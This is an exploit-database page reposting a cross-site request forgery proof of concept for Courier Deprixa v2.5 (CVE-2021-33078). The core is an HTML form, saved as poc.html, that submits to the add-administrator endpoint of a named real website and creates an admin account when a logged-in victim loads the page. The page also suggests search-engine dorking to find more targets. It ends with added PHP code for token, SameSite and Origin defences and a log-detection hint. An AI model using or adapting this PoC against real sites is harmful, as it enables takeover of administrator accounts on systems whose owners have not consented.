COURIER DEPRIXA V2.5 CSRF Vulnerability

CVE             Category  Price  Severity
CVE-2021-33078  CWE-352   $500   High

Author    Risk  Exploitation Type  Date
John Doe  High  Remote             2022-07-28
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022070077

Below is a copy:

COURIER DEPRIXA V2.5 CSRF Vulnerability
====================================================================================================================================
| # Title     : COURIER DEPRIXA V2.5 CSRF Vulnerability                                                                            |
| # Author    : indoushka                                                                                                          |
| # Tested on : Windows 10 Français V.(Pro) / browser : Mozilla Firefox 102.0.1 (64-bit)                                          |
| # Vendor    : https://www.themeslide.com/courier-deprixa-logistics-worldwide-v2-5/                                               |  
| # Dork      :                                                                                                                    |
====================================================================================================================================

PoC:

[+] Dorking on Google or other search engines.

[+] Use payload: save as poc.html

[+]  <h4 class="modal-title" id="myModalLabel"><i class="fa fa-user-plus"></i> New Administrator</h4>
  </div>
  <div class="modal-body">
  <!--Modal body: the form goes here-->
<form action="https://galaxyexpressuae.com/deprixa/settings/addusersadmin/agregar.php"  class="form-horizontal" method="post">
  <div class="form-group " id="gnombrepa">
<label for="off_name" class="col-sm-2 control-label">Name</label>
<div class="col-sm-10">
  <input type="text" class="form-control off_name" name="name_parson"  placeholder="Name Administrator ">
</div>
  </div>
  <div class="form-group" id="gapellido">
<label for="email" class="col-sm-2 control-label">Email </label>
<div class="col-sm-5">
  <input type="text" class="form-control email" name="email"   placeholder="Email ">
</div>
<div class="col-sm-5">
  <input class="form-control phone" name="phone" placeholder="Phone">  
</div>
  </div>
  <div class="form-group" id="gemail">
<label for="office" class="col-sm-2 control-label">Office</label>
<div class="col-sm-5">
  <input type="text" class="form-control office" name="office"  placeholder="Office ">
</div>
<div class="col-sm-5">
<select type="text" class="form-control role" name="role" >
  <option value="Administrator">Administrator</option>
</select>
</div>
  </div>
  <div class="form-group " id="gnombre">
<label for="off_name" class="col-sm-2 control-label">User</label>
<div class="col-sm-10">
  <input type="text" class="form-control off_name" name="name"  placeholder="User">
</div>
  </div>
  <div class="form-group" id="gpassword">
<label for="pwd" class="col-sm-2 control-label">Password</label>
<div class="col-sm-10">
  <input type="text" class="form-control pwd" name="pwd"  placeholder="Password">
</div>
  </div>
  <div class="form-group">
<div class="col-sm-offset-2 col-sm-10">
<div class="checkbox checkbox-success">
<input id="checkbox3" type="checkbox" name="estado" value="1" checked>
<label for="checkbox3">
Status
</label>
</div>
<div class="checkbox checkbox-inline" >
<input type="checkbox"  name="type" value="a" onclick="return false" checked>
<label for="inlineCheckbox3"> Type of user </label>
</div>
</div>
  </div>
<!--End of modal body-->
</div>
<div class="modal-footer">
<button type="button" class="btn btn-default" data-dismiss="modal"><i class="fa fa-times"></i>
Close</button>
<input class="btn btn-success" name="Submit" type="submit"  id="submit" value="Save">
</div>
</form>
</div>
  </div>
</div>
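The poc.html page above works because the handler behind agregar.php accepts the POST with nothing but the victim's session cookie as proof of who sent it. The following is an added example (not Courier Deprixa's code; the vendor's handler is not reproduced here) of the synchronizer-token check such a handler needs before creating an administrator, with a SameSite session cookie and an Origin comparison as defence in depth. Function names and the csrf_token field name are assumptions; the form field names are the ones the PoC posts.

```php
<?php
// Added example, not Courier Deprixa's code: the synchronizer-token check a
// handler such as agregar.php needs before it creates an administrator.
declare(strict_types=1);

// Session cookie flags: SameSite=Lax alone already stops a cross-site POST like
// the PoC from carrying the admin's session (PHP >= 7.3 for the array form).
session_set_cookie_params([
    'secure'   => true,
    'httponly' => true,
    'samesite' => 'Lax',
]);
session_start();

// Issue one unguessable token per session for the legitimate "New Administrator" form.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field the real form must carry; a foreign page cannot read it cross-origin.
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

// Constant-time comparison of the submitted value against the session copy.
// Untyped parameter so a crafted csrf_token[]=x (an array) fails cleanly.
function csrf_valid($submitted): bool
{
    return is_string($submitted)
        && isset($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // Browsers attach Origin to cross-site POSTs; a foreign origin or a missing
    // token means the request did not come from this application's own UI.
    $origin   = $_SERVER['HTTP_ORIGIN'] ?? '';
    $expected = 'https://' . ($_SERVER['HTTP_HOST'] ?? '');
    if (($origin !== '' && $origin !== $expected) || !csrf_valid($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Request rejected: missing CSRF token or cross-origin submission');
    }
    // Only now read name_parson, email, role, pwd, etc. and create the account.
}
```

Detection side: a POST to the add-admin path whose Origin or Referer header is not the application's own host is the signature of this PoC in web server logs.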

Greetings to:
=======================================================================================================================================
jericho * Larry W. Cashdollar * brutelogic * hyp3rlinx * 9aylas * shadow_00715 * LiquidWorm * moncet
=======================================================================================================================================

Copyright ©2024 Exploitalert.